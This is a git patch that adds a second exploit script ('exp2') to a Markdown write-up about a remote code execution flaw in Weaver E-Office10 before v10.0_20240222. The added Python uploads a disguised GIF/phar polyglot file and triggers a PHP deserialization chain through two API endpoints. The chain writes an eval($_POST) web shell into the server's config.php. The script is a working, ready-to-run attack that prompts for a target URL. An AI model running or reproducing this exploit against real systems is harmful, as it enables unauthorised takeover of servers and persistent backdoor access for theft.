From 5047249fc49e774167f9d233925b85ba2c1f6d0a Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 7 Apr 2024 10:52:59 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?=
 =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��本小于v10.0_20240222存在远程代码执行漏洞.md | 54 +++++++++++++++++++
 1 file changed, 54 insertions(+)

diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
index 8e560c9..446dbc8 100644
--- a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
+++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
@@ -154,6 +154,60 @@ if __name__ == '__main__':
     payload(url,cmd)
 ```
 
+## exp2
+```
+# -*- coding:utf-8 -*-
+import json
+import requests
+import urllib3
+import base64
+
+
+def payload(url):
+    urls = url + '/eoffice10/server/public/api/attachment/atuh-file'
+    hearder = {
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36'}
+    file = base64.b64decode(       "R0lGODlhPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQpSAQAAAQAAABEAAAABAAAAAAAcAQAATzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6NTE6ImVjaG8gXjw/cGhwIGV2YWwoJF9QT1NUWzFdKTs/Xj4gPiAuLi93d3cvY29uZmlnLnBocCI7fX0IAAAAdGVzdC50eHQEAAAAXcwLZgQAAAAMfn/YtgEAAAAAAAB0ZXN0r2B11kfQUeYqVgXThGL/oWPzcSMCAAAAR0JNQg==")
+    upload_file = {"Filedata": ("register.inc", file, "image/jpeg")}
+    urllib3.disable_warnings()
+    response = requests.post(url=urls, files=upload_file, headers=hearder)
+    response_text = response.text
+    attachment_id = json.loads(response_text)['data']['attachment_id']
+
+    urls = url + '/eoffice10/server/public/api/attachment/path/migrate'
+    headerss = {
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36',
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Accept-Encoding': 'gzip'
+    }
+    data1 = 'source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F'
+    urllib3.disable_warnings()
+    response = requests.post(url=urls, headers=headerss, data=data1,verify=False )
+
+    urls = url + '/eoffice10/server/public/api/empower/import'
+    headersss = {
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36',
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Accept-Encoding': 'gzip'
+    }
+    urllib3.disable_warnings()
+    data2 = 'type=tttt&file=' + attachment_id
+    response = requests.post(url=urls, verify=False, headers=headersss, data=data2 )
+    response_text = response.text
+    if "no_file" in response_text:
+        print("写入成功")
+    else:
+        print("写入失败")
+
+
+if __name__ == '__main__':
+    url = input("url: ")
+    if not url.startswith(("http://", "https://")):
+        url = "http://" + url
+    if url.endswith("/"):
+        url = url[:-1]
+    payload(url)
+```
 
 ## 漏洞来源
 - https://mp.weixin.qq.com/s/45_7Qz8AH1w471rbtFCyjw